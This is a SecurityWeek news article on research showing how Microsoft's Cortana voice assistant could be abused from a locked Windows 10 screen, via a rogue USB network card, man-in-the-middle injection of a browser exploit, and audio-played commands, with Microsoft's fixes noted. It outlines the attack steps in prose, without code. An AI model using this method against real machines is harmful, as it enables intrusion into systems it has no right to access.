Security Experts:

Connect with us

Hi, what are you looking for?


Cloud Security

Cortana Can Expose Enterprises to Attacks, Researchers Warn

Malicious actors may be able to abuse voice-based virtual assistants to hack into enterprise systems and researchers proved it through an attack that targets Microsoft Cortana.

Malicious actors may be able to abuse voice-based virtual assistants to hack into enterprise systems and researchers proved it through an attack that targets Microsoft Cortana.

Independent researchers Amichai Shulman, former CTO and co-founder of Imperva, and Tal Be’ery, former VP of research at Microsoft-acquired security firm Aorato, have found a way to conduct an evil maid attack that abuses the Cortana voice assistant to install malware onto a locked computer. The researchers are detailing their findings on Friday at Kaspersky Lab’s Security Analyst Summit (SAS) in Cancun, Mexico.

In Windows 10, if default settings are not changed, any user can interact with Cortana by saying “Hey Cortana,” and it works even if the device is locked.

Shulman and Be’ery explained that when the device is locked, the screen is locked and the keyboard cannot be used to control applications, but apps can still run in the background.

In an attack scenario they described, an evil maid (i.e. a hacker who has physical access to the targeted machine) can install malware on a locked device by telling Cortana to access a website, intercepting traffic to that site using a device attached to the PC, and injecting malicious code into the connection.

One of the voice commands accepted by Cortana from the lock screen is “go to [website domain].” If the user tells Cortana to access any site, Windows launches a browser process and sends a query for the domain name to Bing. In the case of “privileged” websites, such as, Windows would launch a browser process and navigate to the site directly. After being notified by the researchers of the potential for abuse, Microsoft has decided to make some changes and no longer allow direct browsing from a locked machine.

The first step in the attack scenario described by Shulman and Be’ery involves plugging in a rogue USB network card or network cable into the targeted machine. The attacker then instructs Cortana to access a privileged website that does not use a secure HTTPS connection (e.g.

Since the connection is not protected, the hacker’s network card can be used to conduct a man-in-the-middle (MitM) attack and replace normal traffic with malicious code, such as a web browser exploit designed to deliver a piece of malware. The malware then provides a remote backdoor to the compromised system.

If the attacker already had access to a system, they could have conducted a remote attack where a piece of malware played an audio file that instructed Cortana to navigate to an arbitrary website. This could have been used to hack other devices on the targeted enterprise network.

“The attacker uses the infected computer speakers to send the Cortana commands as before (plays ‘Go to’). The attacker gets network access to the next victim computer (the equivalent of the network cable USB network card) through a known network attack (e.g. ARP poisoning) and replaces the content of with malicious content,” Be’ery told SecurityWeek.

Microsoft made some server-side changes in August 2017 in order to prevent abuse, but Shulman and Be’ery believe there could be other Cortana commands that can be leveraged for similar attacks, and noted that the research can be extended to other voice assistants, such as Apple’s Siri.

As part of their research, the experts also developed a tool, named Newspeak, that acts as a proxy for communications between Cortana and Microsoft servers.

“The Newspeak tool enables its user to monitor Cortana requests (user says ‘go to’ and Cortana cloud sends that interpreted text back) and results (Cortana cloud commands the Cortana client to perform the action of ‘browse to’) and therefore create an audit log of Cortana. It can be used to detect malicious and abnormal usage and block/alert,” Be’ery explained.

“Another use of the Newspeak tool can be to alter the commands for fun/malicious purposes (user request cnn, let’s give him fox news), or for defensive use cases (instead of going to the HTTP version of CNN go to the HTTPS version),” he added.

The researchers told SecurityWeek that they will make the Newspeak tool available at some point.

Written By

Eduard Kovacs (@EduardKovacs) is a contributing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this webinar to learn best practices that organizations can use to improve both their resilience to new threats and their response times to incidents.


Join this live webinar as we explore the potential security threats that can arise when third parties are granted access to a sensitive data or systems.


Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.


Less than a week after announcing that it would suspended service indefinitely due to a conflict with an (at the time) unnamed security researcher...

Data Protection

The CRYSTALS-Kyber public-key encryption and key encapsulation mechanism recommended by NIST for post-quantum cryptography has been broken using AI combined with side channel attacks.

Data Protection

The cryptopocalypse is the point at which quantum computing becomes powerful enough to use Shor’s algorithm to crack PKI encryption.


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.

Cloud Security

Microsoft and Proofpoint are warning organizations that use cloud services about a recent consent phishing attack that abused Microsoft’s ‘verified publisher’ status.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...